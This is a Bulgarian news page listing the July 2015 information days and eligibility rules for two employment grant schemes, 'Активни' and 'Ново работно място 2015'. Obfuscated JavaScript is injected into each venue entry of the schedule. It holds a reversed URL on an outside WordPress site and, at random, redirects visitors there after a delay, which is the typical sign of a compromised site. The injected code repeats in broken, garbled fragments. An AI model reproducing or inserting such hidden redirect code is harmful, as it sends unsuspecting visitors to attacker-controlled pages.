ГРАФИК НА ИНФОРМАЦИОННАТА КАМПАНИЯ НА ОПРЧР 2014-2020 ПО СХЕМИ АКТИВНИ И НОВО РАБОТНО МЯСТО 2015

July 6, 2015 in ОТТ Новини

Във връзка със старта на схемите „Активни” и „Ново работно място 2015″по Приоритетна ос 1 „Подобряване достъпа до заетост и качеството на работните места” на ОПРЧР 2014-2020, Главна дирекция „Европейски фондове, международни програми и проекти” към Министерство на труда и социалната политика, в качеството си на Управляващ орган, организира провеждането на информационни дни за представяне на насоките за кандидатстване.

Дата

Място на провеждане

1 юли 2015
10:00-16:00 ч.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top" width="356">гр. Варна

хотел Голдън Тюлип, зала Дали

бул. Христо Ботев № 3А

3 юли 2015
10:00-16:00 ч.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top" width="356">гр. Велико Търново

Меридиан хотел Болярски, зала Калоян

ул. Стефан Стамболов № 53 А

7 юли 2015
10:00-16:00 ч.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top" width="356">гр. Бургас

хотел България, зала Компас

ул. Александровска № 21

9 юли 2015
10:00-16:00 ч.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top" width="356">гр. Пловдив

хотел Империал Пловдив&Спа, зала Бална

ул. Лев Толстой № 6/ул. Арх. Камен Петков 1А

13 юли 2015
10:00-16:00 ч.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top" width="356">гр. София

хотел Бест Уестърн Експо, зала Еспланада
Бул. Цариградско Шосе № 149
Метро станция „Цариградско шосе"

 

Програма за всички събития

10:00 - 10:30 ч.         Регистрация на участниците за схема „Активни"

10:30 - 12:30 ч.         Представяне на схема „Активни" - насоки за кандидатстване и приложенията към тях. Дискусия, въпроси и отговори.

12:30 - 13:30 ч.         Обедна почивка

13:30 - 14:00 ч.         Регистрация на участниците за схема „Ново Работно място 2015"

14:00 - 16:00 ч.         Представяне на схема „Ново Работно място 2015" - насоки за

кандидатстване и приложенията към тях. Дискусия, въпроси и отговори.

Забележка:

Не се изисква предварителна регистрация за участие.

Разходите за командироване на участниците - транспортни, дневни и квартирни, не се поемат от организаторите.

 

 

СХЕМА „АКТИВНИ"

Цели на схемата за безвъзмездна финансова помощ:

Основна цел на операцията е активиране и интеграция в заетост на младежи до 29-годишна възраст вкл., които не са нито в образование или обучение, нито в заетост, вкл. не са регистрирани като безработни лица в Агенция по заетостта. Операцията ще бъде насочена към идентифициране и мотивиране за активно поведение на пазара на труда на неактивни младежи от целевата група, с последващи дейности за включване в заетост, обучение или връщане в образование.

Допустими кандидати:

Неправителствени организации; организации, предоставящи посреднически услуги на пазара на труда; центрове за информация и професионално ориентиране; центрове за професионално обучение; неправителствени организации; социални партньори; общини и райони на общини, работодатели.

Размер на БФП на проект: мин. 200 000 лв.; макс. 391 166 лв.

Дейностите, които ще получат подкрепа включват:

1. Дейности за идентифициране на икономически неактивни младежи до 29 г. възраст включително, които не са в образование или обучение, и активиране за включването им на пазара на труда.

2. Предоставяне на мотивационни обучения за активно търсене на работа.

3. Предоставяне на обучения за придобиване на професионална квалификация или ключови компетентности в областите чуждоезиково обучение и дигитална компетентност - само във връзка с конкретна възможност за наемане на работа след обучението.

4. Наемане на лица от целевата група на длъжности, попадащи в обхвата на единични групи професии от 2 до 9 клас от НКПД 2011 г., за период до 6 месеца.

 

СХЕМА „НОВО РАБОТНО МЯСТО 2015"

Цели на схемата за безвъзмездна финансова помощ:

Операцията има за цел да осигури предпоставки за създаване на устойчиви работни места за безработни и неактивни лица. Тази цел ще бъде постигната посредством комбинация от мерки за осигуряване на подходящи обучения, включително на работното място, както и предоставяне на разнообразни стимули за работодателите за разкриване на нови работни места. Поставя се акцент върху интеграцията на уязвимите групи на пазара на труда.

Допустими кандидати: работодатели

Размер на БФП на проект: мин. 50 000 лв.; макс. 391 166 лв.

Допустими дейности:

1. Наемане на безработни и/или неактивни лица за период до 12 месеца - задължителна.

2. Предоставяне на професионално обучение за придобиване на първа или втора квалификационна степен и обучение по част от професия по първа, втора или трета квалификационна степен на вече наетите по проекта лица.

3. Предоставяне на обучение по ключови компетентности съгласно Европейската квалификационна рамка по: Ключова компетентност 2„Общуване на чужди езици", Ключова компетентност 4 „Дигитална компетентност" на вече наетите по проекта лица.

4. Закупуване на оборудване, обзавеждане, ДНА и стопански инвентар, свързани със създаването на нови работни места.

5. Оборудване и адаптиране на нови работни места за хора с увреждания, вкл. ремонтни дейности, в случай на необходимост.

6. Осигуряване на наставник за хората с увреждания. Всеки наставник отговаря за минимум 1 и максимум 7 души - представители на целевата група.

6.1. Други дейности, свързани и произтичащи от участието на хора с увреждания.